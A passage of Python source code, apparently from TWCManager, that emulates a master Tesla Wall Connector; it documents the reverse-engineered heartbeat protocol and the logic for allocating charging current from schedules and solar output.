heartbeatData[5], heartbeatData[6]
)
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" % (heartbeatData[7], heartbeatData[8]))
debugOutput += " M"
if(not fakeMaster):
debugOutput += " %02X%02X" % (masterTWCID[0], masterTWCID[1])
debugOutput += ": %02X %05.2f/%05.2fA %02X%02X" % \
(self.masterHeartbeatData[0],
(((self.masterHeartbeatData[3] << 8) + self.masterHeartbeatData[4]) / 100),
(((self.masterHeartbeatData[1] << 8) + self.masterHeartbeatData[2]) / 100),
self.masterHeartbeatData[5], self.masterHeartbeatData[6])
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" %
(self.masterHeartbeatData[7], self.masterHeartbeatData[8]))
# Only output once-per-second heartbeat debug info when it's
# different from the last output or if the only change has been amps
# in use and it's only changed by 1.0 or less. Also output f it's
# been 10 mins since the last output or if debugLevel is turned up
# to 11.
lastAmpsUsed = 0
ampsUsed = 1
debugOutputCompare = debugOutput
m1 = re.search(r'SHB ....: .. (..\...)/', self.lastHeartbeatDebugOutput)
if(m1):
lastAmpsUsed = float(m1.group(1))
m2 = re.search(r'SHB ....: .. (..\...)/', debugOutput)
if(m2):
ampsUsed = float(m2.group(1))
if(m1):
debugOutputCompare = debugOutputCompare[0:m2.start(1)] + \
self.lastHeartbeatDebugOutput[m1.start(1):m1.end(1)] + \
debugOutputCompare[m2.end(1):]
if(
debugOutputCompare != self.lastHeartbeatDebugOutput
or abs(ampsUsed - lastAmpsUsed) >= 1.0
or time.time() - self.timeLastHeartbeatDebugOutput > 600
or debugLevel >= 11
):
print(time_now() + debugOutput)
self.lastHeartbeatDebugOutput = debugOutput
self.timeLastHeartbeatDebugOutput = time.time()
except IndexError:
# This happens if we try to access, say, heartbeatData[8] when
# len(heartbeatData) < 9. This was happening due to a bug I fixed
# but I may as well leave this here just in case.
if(len(heartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying heartbeatData',
heartbeatData, 'based on msg', hex_str(msg))
if(len(self.masterHeartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying masterHeartbeatData', self.masterHeartbeatData)
def send_slave_heartbeat(self, masterID):
# Send slave heartbeat
#
# Heartbeat includes data we store in slaveHeartbeatData.
# Meaning of data:
#
# Byte 1 is a state code:
# 00 Ready
# Car may or may not be plugged in.
# When car has reached its charge target, I've repeatedly seen it
# change from 03 to 00 the moment I wake the car using the phone app.
# 01 Plugged in, charging
# 02 Error
# This indicates an error such as not getting a heartbeat message
# from Master for too long.
# 03 Plugged in, do not charge
# I've seen this state briefly when plug is first inserted, and
# I've seen this state remain indefinitely after pressing stop
# charge on car's screen or when the car reaches its target charge
# percentage. Unfortunately, this state does not reliably remain
# set, so I don't think it can be used to tell when a car is done
# charging. It may also remain indefinitely if TWCManager script is
# stopped for too long while car is charging even after TWCManager
# is restarted. In that case, car will not charge even when start
# charge on screen is pressed - only re-plugging in charge cable
# fixes it.
# 04 Plugged in, ready to charge or charge scheduled
# I've seen this state even when car is set to charge at a future
# time via its UI. In that case, it won't accept power offered to
# it.
# 05 Busy?
# I've only seen it hit this state for 1 second at a time and it
# can seemingly happen during any other state. Maybe it means wait,
# I'm busy? Communicating with car?
# 08 Starting to charge?
# This state may remain for a few seconds while car ramps up from
# 0A to 1.3A, then state usually changes to 01. Sometimes car skips
# 08 and goes directly to 01.
# I saw 08 consistently each time I stopped fake master script with
# car scheduled to charge, plugged in, charge port blue. If the car
# is actually charging and you stop TWCManager, after 20-30 seconds
# the charge port turns solid red, steering wheel display says
# "charge cable fault", and main screen says "check charger power".
# When TWCManager is started, it sees this 08 status again. If we
# start TWCManager and send the slave a new max power value, 08
# becomes 00 and car starts charging again.
#
# Protocol 2 adds a number of other states:
# 06, 07, 09
# These are each sent as a response to Master sending the
# corresponding state. Ie if Master sends 06, slave responds with
# 06. See notes in send_master_heartbeat for meaning.
# 0A Amp adjustment period complete
# Master uses state 06 and 07 to raise or lower the slave by 2A
# temporarily. When that temporary period is over, it changes
# state to 0A.
# 0F was reported by another user but I've not seen it during testing
# and have no idea what it means.
#
# Byte 2-3 is the max current available as provided by bytes 2-3 in our
# fake master status.
# For example, if bytes 2-3 are 0F A0, combine them as 0x0fa0 hex which
# is 4000 in base 10. Move the decimal point two places left and you get
# 40.00Amps max.
#
# Byte 4-5 represents the power the car is actually drawing for
# charging. When a car is told to charge at 19A you may see a value like
# 07 28 which is 0x728 hex or 1832 in base 10. Move the decimal point
# two places left and you see the charger is using 18.32A.
# Some TWCs report 0A when a car is not charging while others may report
# small values such as 0.25A. I suspect 0A is what should be reported
# and any small value indicates a minor calibration error.
#
# Remaining bytes are always 00 00 from what I've seen and could be
# reserved for future use or may be used in a situation I've not
# observed. Protocol 1 uses two zero bytes while protocol 2 uses four.
###############################
# How was the above determined?
#
# An unplugged slave sends a status like this:
# 00 00 00 00 19 00 00
#
# A real master always sends all 00 status data to a slave reporting the
# above status. slaveHeartbeatData[0] is the main driver of how master
# responds, but whether slaveHeartbeatData[1] and [2] have 00 or non-00
# values also matters.
#
# I did a test with a protocol 1 TWC with fake slave sending
# slaveHeartbeatData[0] values from 00 to ff along with
# slaveHeartbeatData[1-2] of 00 and whatever
# value Master last responded with. I found:
# Slave sends: 04 00 00 00 19 00 00
# Master responds: 05 12 c0 00 00 00 00
#
# Slave sends: 04 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# Slave sends: 08 00 00 00 19 00 00
# Master responds: 08 12 c0 00 00 00 00
#
# Slave sends: 08 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# In other words, master always sends all 00 unless slave sends
# slaveHeartbeatData[0] 04 or 08 with slaveHeartbeatData[1-2] both 00.
#
# I interpret all this to mean that when slave sends
# slaveHeartbeatData[1-2] both 00, it's requesting a max power from
# master. Master responds by telling the slave how much power it can
# use. Once the slave is saying how much max power it's going to use
# (slaveHeartbeatData[1-2] = 12 c0 = 32.00A), master indicates that's
# fine by sending 00 00.
#
# However, if the master wants to set a lower limit on the slave, all it
# has to do is send any heartbeatData[1-2] value greater than 00 00 at
# any time and slave will respond by setting its
# slaveHeartbeatData[1-2] to the same value.
#
# I thought slave might be able to negotiate a lower value if, say, the
# car reported 40A was its max capability or if the slave itself could
# only handle 80A, but the slave dutifully responds with the same value
# master sends it even if that value is an insane 655.35A. I tested
# these values on car which has a 40A limit when AC charging and
# slave accepts them all:
# 0f aa (40.10A)
# 1f 40 (80.00A)
# 1f 41 (80.01A)
# ff ff (655.35A)
global fakeTWCID, slaveHeartbeatData, overrideMasterHeartbeatData
if(self.protocolVersion == 1 and len(slaveHeartbeatData) > 7):
# Cut array down to length 7
slaveHeartbeatData = slaveHeartbeatData[0:7]
elif(self.protocolVersion == 2):
while(len(slaveHeartbeatData) < 9):
# Increase array length to 9
slaveHeartbeatData.append(0x00)
send_msg(bytearray(b'\xFD\xE0') + fakeTWCID + bytearray(masterID) + bytearray(slaveHeartbeatData))
def send_master_heartbeat(self):
# Send our fake master's heartbeat to this TWCSlave.
#
# Heartbeat includes 7 bytes (Protocol 1) or 9 bytes (Protocol 2) of data
# that we store in masterHeartbeatData.
# Meaning of data:
#
# Byte 1 is a command:
# 00 Make no changes
# 02 Error
# Byte 2 appears to act as a bitmap where each set bit causes the
# slave TWC to enter a different error state. First 8 digits below
# show which bits are set and these values were tested on a Protocol
# 2 TWC:
# 0000 0001 = Middle LED blinks 3 times red, top LED solid green.
# Manual says this code means 'Incorrect rotary switch
# setting.'
# 0000 0010 = Middle LED blinks 5 times red, top LED solid green.
# Manual says this code means 'More than three Wall
# Connectors are set to Slave.'
# 0000 0100 = Middle LED blinks 6 times red, top LED solid green.
# Manual says this code means 'The networked Wall
# Connectors have different maximum current
# capabilities.'
# 0000 1000 = No effect
# 0001 0000 = No effect
# 0010 0000 = No effect
# 0100 0000 = No effect
# 1000 0000 = No effect
# When two bits are set, the lowest bit (rightmost bit) seems to
# take precedence (ie 111 results in 3 blinks, 110 results in 5
# blinks).
#
# If you send 02 to a slave TWC with an error code that triggers
# the middle LED to blink red, slave responds with 02 in its
# heartbeat, then stops sending heartbeat and refuses further
# communication. Slave's error state can be cleared by holding red
# reset button on its left side for about 4 seconds.
# If you send an error code with bitmap 11110xxx (where x is any bit),
# the error can not be cleared with a 4-second reset. Instead, you
# must power cycle the TWC or 'reboot' reset which means holding
# reset for about 6 seconds till all the LEDs turn green.
# 05 Tell slave charger to limit power to number of amps in bytes 2-3.
#
# Protocol 2 adds a few more command codes:
# 06 Increase charge current by 2 amps. Slave changes its heartbeat
# state to 06 in response. After 44 seconds, slave state changes to
# 0A but amp value doesn't change. This state seems to be used to
# safely creep up the amp value of a slave when the Master has extra
# power to distribute. If a slave is attached to a car that doesn't
# want that many amps, Master will see the car isn't accepting the
# amps and stop offering more. It's possible the 0A state change
# is not time based but rather indicates something like the car is
# now using as many amps as it's going to use.
# 07 Lower charge current by 2 amps. Slave changes its heartbeat state
# to 07 in response. After 10 seconds, slave raises its amp setting
# back up by 2A and changes state to 0A.
# I could be wrong, but when a real car doesn't want the higher amp
# value, I think the TWC doesn't raise by 2A after 10 seconds. Real
# Master TWCs seem to send 07 state to all children periodically as
# if to check if they're willing to accept lower amp values. If
# they do, Master assigns those amps to a different slave using the
# 06 state.
# 08 Master acknowledges that slave stopped charging (I think), but
# the next two bytes contain an amp value the slave could be using.
# 09 Tell slave charger to limit power to number of amps in bytes 2-3.
# This command replaces the 05 command in Protocol 1. However, 05
# continues to be used, but only to set an amp value to be used
# before a car starts charging. If 05 is sent after a car is
# already charging, it is ignored.
#
# Byte 2-3 is the max current a slave TWC can charge at in command codes
# 05, 08, and 09. In command code 02, byte 2 is a bitmap. With other
# command codes, bytes 2-3 are ignored.
# If bytes 2-3 are an amp value of 0F A0, combine them as 0x0fa0 hex
# which is 4000 in base 10. Move the decimal point two places left and
# you get 40.00Amps max.
#
# Byte 4: 01 when a Master TWC is physically plugged in to a car.
# Otherwise 00.
#
# Remaining bytes are always 00.
#
# Example 7-byte data that real masters have sent in Protocol 1:
# 00 00 00 00 00 00 00 (Idle)
# 02 04 00 00 00 00 00 (Error bitmap 04. This happened when I
# advertised a fake Master using an invalid max
# amp value)
# 05 0f a0 00 00 00 00 (Master telling slave to limit power to 0f a0
# (40.00A))
# 05 07 d0 01 00 00 00 (Master plugged in to a car and presumably
# telling slaves to limit power to 07 d0
# (20.00A). 01 byte indicates Master is plugged
# in to a car.)
global fakeTWCID, overrideMasterHeartbeatData, debugLevel, \
timeLastTx, carApiVehicles
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(self.protocolVersion == 2):
# TODO: Start and stop charging using protocol 2 commands to TWC
# instead of car api if I ever figure out how.
if(self.lastAmpsOffered == 0 and self.reportedAmpsActual > 4.0):
# Car is trying to charge, so stop it via car API.
# car_api_charge() will prevent telling the car to start or stop
# more than once per minute. Once the car gets the message to
# stop, reportedAmpsActualSignificantChangeMonitor should drop
# to near zero within a few seconds.
# WARNING: If you own two vehicles and one is charging at home but
# the other is charging away from home, this command will stop
# them both from charging. If the away vehicle is not currently
# charging, I'm not sure if this would prevent it from charging
# when next plugged in.
queue_background_task({'cmd':'charge', 'charge':False})
elif(self.lastAmpsOffered >= 5.0 and self.reportedAmpsActual < 2.0
and self.reportedState != 0x02
):
# Car is not charging and is not reporting an error state, so
# try starting charge via car api.
queue_background_task({'cmd':'charge', 'charge':True})
elif(self.reportedAmpsActual > 4.0):
# At least one plugged in car is successfully charging. We don't
# know which car it is, so we must set
# vehicle.stopAskingToStartCharging = False on all vehicles such
# that if any vehicle is not charging without us calling
# car_api_charge(False), we'll try to start it charging again at
# least once. This probably isn't necessary but might prevent
# some unexpected case from never starting a charge. It also
# seems less confusing to see in the output that we always try
# to start API charging after the car stops taking a charge.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
send_msg(bytearray(b'\xFB\xE0') + fakeTWCID + bytearray(self.TWCID)
+ bytearray(self.masterHeartbeatData))
def receive_slave_heartbeat(self, heartbeatData):
# Handle heartbeat message received from real slave TWC.
global debugLevel, nonScheduledAmpsMax, \
maxAmpsToDivideAmongSlaves, wiringMaxAmpsAllTWCs, \
timeLastGreenEnergyCheck, greenEnergyAmpsOffset, \
slaveTWCRoundRobin, spikeAmpsToCancel6ALimit, \
chargeNowAmps, chargeNowTimeEnd, minAmpsPerTWC
now = time.time()
self.timeLastRx = now
self.reportedAmpsMax = ((heartbeatData[1] << 8) + heartbeatData[2]) / 100
self.reportedAmpsActual = ((heartbeatData[3] << 8) + heartbeatData[4]) / 100
self.reportedState = heartbeatData[0]
# self.lastAmpsOffered is initialized to -1.
# If we find it at that value, set it to the current value reported by the
# TWC.
if(self.lastAmpsOffered < 0):
self.lastAmpsOffered = self.reportedAmpsMax
# Keep track of the amps the slave is actually using and the last time it
# changed by more than 0.8A.
# Also update self.reportedAmpsActualSignificantChangeMonitor if it's
# still set to its initial value of -1.
if(self.reportedAmpsActualSignificantChangeMonitor < 0
or abs(self.reportedAmpsActual - self.reportedAmpsActualSignificantChangeMonitor) > 0.8
):
self.timeReportedAmpsActualChangedSignificantly = now
self.reportedAmpsActualSignificantChangeMonitor = self.reportedAmpsActual
ltNow = time.localtime()
hourNow = ltNow.tm_hour + (ltNow.tm_min / 60)
yesterday = ltNow.tm_wday - 1
if(yesterday < 0):
yesterday += 7
# Check if it's time to resume tracking green energy.
if(nonScheduledAmpsMax != -1 and hourResumeTrackGreenEnergy > -1
and hourResumeTrackGreenEnergy == hourNow
):
nonScheduledAmpsMax = -1
save_settings()
# Check if we're within the hours we must use scheduledAmpsMax instead
# of nonScheduledAmpsMax
blnUseScheduledAmps = 0
if(scheduledAmpsMax > 0
and
scheduledAmpsStartHour > -1
and
scheduledAmpsEndHour > -1
and
scheduledAmpsDaysBitmap > 0
):
if(scheduledAmpsStartHour > scheduledAmpsEndHour):
# We have a time like 8am to 7am which we must interpret as the
# 23-hour period after 8am or before 7am. Since this case always
# crosses midnight, we only ensure that scheduledAmpsDaysBitmap
# is set for the day the period starts on. For example, if
# scheduledAmpsDaysBitmap says only schedule on Monday, 8am to
# 7am, we apply scheduledAmpsMax from Monday at 8am to Monday at
# 11:59pm, and on Tuesday at 12am to Tuesday at 6:59am.
if(
(
hourNow >= scheduledAmpsStartHour
and
(scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
)
or
(
hourNow < scheduledAmpsEndHour
and
(scheduledAmpsDaysBitmap & (1 << yesterday))
)
):
blnUseScheduledAmps = 1
else:
# We have a time like 7am to 8am which we must interpret as the
# 1-hour period between 7am and 8am.
if(hourNow >= scheduledAmpsStartHour
and hourNow < scheduledAmpsEndHour
and (scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
):
blnUseScheduledAmps = 1
if(chargeNowTimeEnd > 0 and chargeNowTimeEnd < now):
# We're beyond the one-day period where we want to charge at
# chargeNowAmps, so reset the chargeNow variables.
chargeNowAmps = 0
chargeNowTimeEnd = 0
if(chargeNowTimeEnd > 0 and chargeNowAmps > 0):
# We're still in the one-day period where we want to charge at
# chargeNowAmps, ignoring all other charging criteria.
maxAmpsToDivideAmongSlaves = chargeNowAmps
if(debugLevel >= 10):
print(time_now() + ': Charge at chargeNowAmps %.2f' % (chargeNowAmps))
elif(blnUseScheduledAmps):
# We're within the scheduled hours that we need to provide a set
# number of amps.
maxAmpsToDivideAmongSlaves = scheduledAmpsMax
else:
if(nonScheduledAmpsMax > -1):
maxAmpsToDivideAmongSlaves = nonScheduledAmpsMax
elif(now - timeLastGreenEnergyCheck > 30):
timeLastGreenEnergyCheck = now
# Don't bother to check solar generation before 6am or after
# 8pm. Sunrise in most U.S. areas varies from a little before
# 6am in Jun to almost 7:30am in Nov before the clocks get set
# back an hour. Sunset can be ~4:30pm to just after 8pm.
if(ltNow.tm_hour < 6 or ltNow.tm_hour >= 20):
maxAmpsToDivideAmongSlaves = 0
else:
queue_background_task({'cmd':'checkGreenEnergy'})
# Use backgroundTasksLock to prevent the background thread from changing
# the value of maxAmpsToDivideAmongSlaves after we've checked the value
# is safe to use but before we've used it.
backgroundTasksLock.acquire()
if(maxAmpsToDivideAmongSlaves > wiringMaxAmpsAllTWCs):
# Never tell the slaves to draw more amps than the physical charger
# wiring can handle.
if(debugLevel >= 1):
print(time_now() +
" ERROR: maxAmpsToDivideAmongSlaves " + str(maxAmpsToDivideAmongSlaves) +
" > wiringMaxAmpsAllTWCs " + str(wiringMaxAmpsAllTWCs) +
".\nSee notes above wiringMaxAmpsAllTWCs in the 'Configuration parameters' section.")
maxAmpsToDivideAmongSlaves = wiringMaxAmpsAllTWCs
# Determine how many cars are charging and how many amps they're using
numCarsCharging = 1
desiredAmpsOffered = maxAmpsToDivideAmongSlaves
for slaveTWC in slaveTWCRoundRobin:
if(slaveTWC.TWCID != self.TWCID):
# To avoid exceeding maxAmpsToDivideAmongSlaves, we must
# subtract the actual amps being used by this TWC from the amps
# we will offer.
desiredAmpsOffered -= slaveTWC.reportedAmpsActual
if(slaveTWC.reportedAmpsActual >= 1.0):
numCarsCharging += 1
# Allocate this slave a fraction of maxAmpsToDivideAmongSlaves divided
# by the number of cars actually charging.
fairShareAmps = int(maxAmpsToDivideAmongSlaves / numCarsCharging)
if(desiredAmpsOffered > fairShareAmps):
desiredAmpsOffered = fairShareAmps
if(debugLevel >= 10):
print("desiredAmpsOffered reduced from " + str(maxAmpsToDivideAmongSlaves)
+ " to " + str(desiredAmpsOffered)
+ " with " + str(numCarsCharging)
+ " cars charging.")
backgroundTasksLock.release()
minAmpsToOffer = minAmpsPerTWC
if(self.minAmpsTWCSupports > minAmpsToOffer):
minAmpsToOffer = self.minAmpsTWCSupports
if(desiredAmpsOffered < minAmpsToOffer):
if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):
# There is enough power available to give each car
# minAmpsToOffer, but currently-charging cars are leaving us
# less power than minAmpsToOffer to give this car.
#
# minAmpsToOffer is based on minAmpsPerTWC which is
# user-configurable, whereas self.minAmpsTWCSupports is based on
# the minimum amps TWC must be set to reliably start a car
# charging.
#
# Unfortunately, we can't tell if a car is plugged in or wanting
# to charge without offering it minAmpsTWCSupports. As the car
# gradually starts to charge, we will see it using power and
# tell other TWCs on the network to use less power. This could
# cause the sum of power used by all TWCs to exceed
# wiringMaxAmpsAllTWCs for a few seconds, but I don't think
# exceeding by up to minAmpsTWCSupports for such a short period
# of time will cause problems.
if(debugLevel >= 10):
print("desiredAmpsOffered increased from " + str(desiredAmpsOffered)
+ " to " + str(self.minAmpsTWCSupports)
+ " (self.minAmpsTWCSupports)")
desiredAmpsOffered = self.minAmpsTWCSupports
else:
# There is not enough power available to give each car
# minAmpsToOffer, so don't offer power to any cars. Alternately,
# we could charge one car at a time and switch cars
# periodically, but I'm not going to try to implement that.
#
# Note that 5A is the lowest value you can set using the Tesla car's
# main screen, so lower values might have some adverse affect on the
# car. I actually tried lower values when the sun was providing
# under 5A of power and found the car would occasionally set itself
# to state 03 and refuse to charge until you re-plugged the charger
# cable. Clicking "Start charging" in the car's UI or in the phone
# app would not start charging.
#
# A 5A charge only delivers ~3 miles of range to the car per hour,
# but it forces the car to remain "on" at a level that it wastes
# some power while it's charging. The lower the amps, the more power
# is wasted. This is another reason not to go below 5A.
#
# So if there isn't at least 5A of power available, pass 0A as the
# desired value. This tells the car to stop charging and it will
# enter state 03 and go to sleep. You will hear the power relay in
# the TWC turn off. When desiredAmpsOffered trends above 6A again,
# it tells the car there's power.
# If a car is set to energy saver mode in the car's UI, the car
# seems to wake every 15 mins or so (unlocking or using phone app
# also wakes it) and next time it wakes, it will see there's power
# and start charging. Without energy saver mode, the car should
# begin charging within about 10 seconds of changing this value.
if(debugLevel >= 10):
print("desiredAmpsOffered reduced to 0 from " + str(desiredAmpsOffered)
+ " because maxAmpsToDivideAmongSlaves "
+ str(maxAmpsToDivideAmongSlaves)
+ " / numCarsCharging " + str(numCarsCharging)
+ " < minAmpsToOffer " + str(minAmpsToOffer))
desiredAmpsOffered = 0
if(
self.lastAmpsOffered > 0
and
(
now - self.timeLastAmpsOfferedChanged < 60
or
now - self.timeReportedAmpsActualChangedSignificantly < 60
or
self.reportedAmpsActual < 4.0
)
):
# We were previously telling the car to charge but now we want
# to tell it to stop. However, it's been less than a minute
# since we told it to charge or since the last significant
# change in the car's actual power draw or the car has not yet
# started to draw at least 5 amps (telling it 5A makes it
# actually draw around 4.18-4.27A so we check for
# self.reportedAmpsActual < 4.0).
#
# Once we tell the car to charge, we want to keep it going for
# at least a minute before turning it off again. concern is that
# yanking the power at just the wrong time during the
# start-charge negotiation could put the car into an error state
# where it won't charge again without being re-plugged. This
# concern is hypothetical and most likely could not happen to a
# real car, but I'd rather not take any chances with getting
# someone's car into a non-charging state so they're stranded
# when they need to get somewhere. Note that non-Tesla cars
# using third-party adapters to plug in are at a higher risk of
# encountering this sort of hypothetical problem.
#
# The other reason for this tactic is that in the minute we
# wait, desiredAmpsOffered might rise above 5A in which case we
# won't have to turn off the charger power at all. Avoiding too
# many on/off cycles preserves the life of the TWC's main power
# relay and may also prevent errors in the car that might be
# caused by turning its charging on and off too rapidly.
#
# Seeing self.reportedAmpsActual < 4.0 means the car hasn't
# ramped up to whatever level we told it to charge at last time.
# It may be asleep and take up to 15 minutes to wake up, see
# there's power, and start charging.
#
# Unfortunately, self.reportedAmpsActual < 4.0 can also mean the
# car is at its target charge level and may not accept power for
# days until the battery drops below a certain level. I can't
# think of a reliable way to detect this case. When the car
# stops itself from charging, we'll see self.reportedAmpsActual
# drop to near 0.0A and heartbeatData[0] becomes 03, but we can
# see the same 03 state when we tell the TWC to stop charging.
# We could record the time the car stopped taking power and
# assume it won't want more for some period of time, but we
# can't reliably detect if someone unplugged the car, drove it,
# and re-plugged it so it now needs power, or if someone plugged
# in a different car that needs power. Even if I see the car
# hasn't taken the power we've offered for the
# last hour, it's conceivable the car will reach a battery state
# where it decides it wants power the moment we decide it's safe
# to stop offering it. Thus, I think it's safest to always wait
# until the car has taken 5A for a minute before cutting power
# even if that means the car will charge for a minute when you
# first plug it in after a trip even at a time when no power
# should be available.
#
# One advantage of the above situation is that whenever you plug
# the car in, unless no power has been available since you
# unplugged, the charge port will turn green and start charging
# for a minute. This lets the owner quickly see that TWCManager
# is working properly each time they return home and plug in.
if(debugLevel >= 10):
print("Don't stop charging yet because: " +
'time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
' < 60 or time - self.timeReportedAmpsActualChangedSignificantly ' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)) +
' < 60 or self.reportedAmpsActual ' + str(self.reportedAmpsActual) +
' < 4')
desiredAmpsOffered = minAmpsToOffer
else:
# We can tell the TWC how much power to use in 0.01A increments, but
# the car will only alter its power in larger increments (somewhere
# between 0.5 and 0.6A). The car seems to prefer being sent whole
# amps and when asked to adjust between certain values like 12.6A
# one second and 12.0A the next second, the car reduces its power
# use to ~5.14-5.23A and refuses to go higher. So it seems best to
# stick with whole amps.
desiredAmpsOffered = int(desiredAmpsOffered)
if(self.lastAmpsOffered == 0
and now - self.timeLastAmpsOfferedChanged < 60
):
# Keep charger off for at least 60 seconds before turning back
# on. See reasoning above where I don't turn the charger off
# till it's been on at least 60 seconds.
if(debugLevel >= 10):
print("Don't start charging yet because: " +
'self.lastAmpsOffered ' +
str(self.lastAmpsOffered) + " == 0 " +
'and time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
" < 60")
desiredAmpsOffered = self.lastAmpsOffered
else:
# Mid Oct 2017, Tesla pushed a firmware update to their cars
# that seems to create the following bug:
# If you raise desiredAmpsOffered AT ALL from the car's current
# max amp limit, the car will drop its max amp limit to the 6A
# setting (5.14-5.23A actual use as reported in
# heartbeatData[2-3]). The odd fix to this problem is to tell
# the car to raise to at least spikeAmpsToCancel6ALimit for 5 or
# more seconds, then tell it to lower the limit to
# desiredAmpsOffered. Even 0.01A less than
# spikeAmpsToCancel6ALimit is not enough to cancel the 6A limit.
#
# I'm not sure how long we have to hold spikeAmpsToCancel6ALimit
# but 3 seconds is definitely not enough but 5 seconds seems to
# work. It doesn't seem to matter if the car actually hits
# spikeAmpsToCancel6ALimit of power draw. In fact, the car is
# slow enough to respond that even with 10s at 21A the most I've
# seen it actually draw starting at 6A is 13A.
if(debugLevel >= 10):
print('desiredAmpsOffered=' + str(desiredAmpsOffered) +
' spikeAmpsToCancel6ALimit=' + str(spikeAmpsToCancel6ALimit) +
' self.lastAmpsOffered=' + str(self.lastAmpsOffered) +
' self.reportedAmpsActual=' + str(self.reportedAmpsActual) +
' now - self.timeReportedAmpsActualChangedSignificantly=' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)))
if(
# If we just moved from a lower amp limit to
# a higher one less than spikeAmpsToCancel6ALimit.
(
desiredAmpsOffered < spikeAmpsToCancel6ALimit
and
desiredAmpsOffered > self.lastAmpsOffered
)
or
(
# ...or if we've been offering the car more amps than it's
# been using for at least 10 seconds, then we'll change the
# amps we're offering it. For some reason, the change in
# amps offered will get the car to up its amp draw.
#
# First, check that the car is drawing enough amps to be
# charging...
self.reportedAmpsActual > 2.0
and
# ...and car is charging at under spikeAmpsToCancel6ALimit.
# I think I've seen cars get stuck between spikeAmpsToCancel6ALimit
# and lastAmpsOffered, but more often a car will be limited
# to under lastAmpsOffered by its UI setting or by the
# charger hardware it has on board, and we don't want to
# keep reducing it to spikeAmpsToCancel6ALimit.
# If cars really are getting stuck above
# spikeAmpsToCancel6ALimit, I may need to implement a
# counter that tries spikeAmpsToCancel6ALimit only a
# certain number of times per hour.
(self.reportedAmpsActual <= spikeAmpsToCancel6ALimit)
and
# ...and car is charging at over two amps under what we
# want it to charge at. I have to use 2 amps because when
# offered, say 40A, the car charges at ~38.76A actual.
# Using a percentage instead of 2.0A doesn't work because
# 38.58/40 = 95.4% but 5.14/6 = 85.6%
(self.lastAmpsOffered - self.reportedAmpsActual) > 2.0
and
# ...and car hasn't changed its amp draw significantly in
# over 10 seconds, meaning it's stuck at its current amp
# draw.
now - self.timeReportedAmpsActualChangedSignificantly > 10
)
):
# We must set desiredAmpsOffered to a value that gets
# reportedAmpsActual (amps the car is actually using) up to
# a value near lastAmpsOffered. At the end of all these
# checks, we'll set lastAmpsOffered = desiredAmpsOffered and
# timeLastAmpsOfferedChanged if the value of lastAmpsOffered was
# actually changed.
if(self.lastAmpsOffered == spikeAmpsToCancel6ALimit
and now - self.timeLastAmpsOfferedChanged > 10):
# We've been offering the car spikeAmpsToCancel6ALimit
# for over 10 seconds but it's still drawing at least
# 2A less than spikeAmpsToCancel6ALimit. I saw this
# happen once when an error stopped the car from
# charging and when the error cleared, it was offered
# spikeAmpsToCancel6ALimit as the first value it saw.
# The car limited itself to 6A indefinitely. In this
# case, the fix is to offer it lower amps.
if(debugLevel >= 1):
print(time_now() + ': Car stuck when offered spikeAmpsToCancel6ALimit. Offering 2 less.')
desiredAmpsOffered = spikeAmpsToCancel6ALimit - 2.0
elif(now - self.timeLastAmpsOfferedChanged > 5):
# self.lastAmpsOffered hasn't gotten the car to draw
# enough amps for over 5 seconds, so try
# spikeAmpsToCancel6ALimit
desiredAmpsOffered = spikeAmpsToCancel6ALimit
else:
# Otherwise, don't change the value of lastAmpsOffered.
desiredAmpsOffered = self.lastAmpsOffered
# Note that the car should have no problem increasing max
# amps to any whole value over spikeAmpsToCancel6ALimit as
# long as it's below any upper limit manually set in the
# car's UI. One time when I couldn't get TWC to push the car
# over 21A, I found the car's UI had set itself to 21A
# despite setting it to 40A the day before. I have been
# unable to reproduce whatever caused that problem.
elif(desiredAmpsOffered < self.lastAmpsOffered):
# Tesla doesn't mind if we set a lower amp limit than the
# one we're currently using, but make sure we don't change
# limits more often than every 5 seconds. This has the side
# effect of holding spikeAmpsToCancel6ALimit set earlier for
# 5 seconds to make sure the car sees it.
if(debugLevel >= 10):
print('Reduce amps: time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)))
if(now - self.timeLastAmpsOfferedChanged < 5):
desiredAmpsOffered = self.lastAmpsOffered
# set_last_amps_offered does some final checks to see if the new
# desiredAmpsOffered is safe. It should be called after we've picked a
# final value for desiredAmpsOffered.
desiredAmpsOffered = self.set_last_amps_offered(desiredAmpsOffered)
# See notes in send_slave_heartbeat() for details on how we transmit
# desiredAmpsOffered and the meaning of the code in
# self.masterHeartbeatData[0].
#
# Rather than only sending desiredAmpsOffered when slave is sending code
# 04 or 08, it seems to work better to send desiredAmpsOffered whenever
# it does not equal self.reportedAmpsMax reported by the slave TWC.
# Doing it that way will get a slave charging again even when it's in
# state 00 or 03 which it swings between after you set
# desiredAmpsOffered = 0 to stop charging.
#
# I later found that a slave may end up swinging between state 01 and 03
# when desiredAmpsOffered == 0:
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
#
# While it's doing this, it's continuously opening and closing the relay
# on the TWC each second which makes an audible click and will wear out
# the relay. To avoid that problem, always send code 05 when
# desiredAmpsOffered == 0. In that case, slave's response should always
# look like this:
# S 032e 0.25/0.00A: 03 0000 0019 0000 M: 05 0000 0000 0000
if(self.reportedAmpsMax != desiredAmpsOffered
or desiredAmpsOffered == 0
):
desiredHundredthsOfAmps = int(desiredAmpsOffered * 100)
